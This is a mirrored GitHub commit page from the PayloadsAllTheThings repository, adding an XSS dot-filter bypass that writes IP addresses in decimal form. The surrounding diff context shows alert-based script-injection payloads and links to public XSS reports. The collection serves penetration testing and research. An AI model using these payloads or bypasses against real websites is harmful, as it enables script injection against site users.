mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Merge pull request #86 from JLLeitschuh/patch-1
Add XSS dot filter bypass with decimal IP
This commit is contained in:
Swissky
GitHub
commit
c6824e7aa9
1 changed files with 4 additions and 1 deletions
|
|
@ -557,6 +557,9 @@ You can bypass a single quote with ' in an on mousedown event handler
|
||||||
<script>window['alert'](document['domain'])</script>
|
<script>window['alert'](document['domain'])</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
|
||||||
|
http://www.geektools.com/cgi-bin/ipconv.cgi
|
||||||
|
|
||||||
### Bypass parenthesis for string
|
### Bypass parenthesis for string
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
|
@ -1043,4 +1046,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||||
- [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
|
- [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
|
||||||
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
|
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
|
||||||
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
|
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
|
||||||
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
|
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue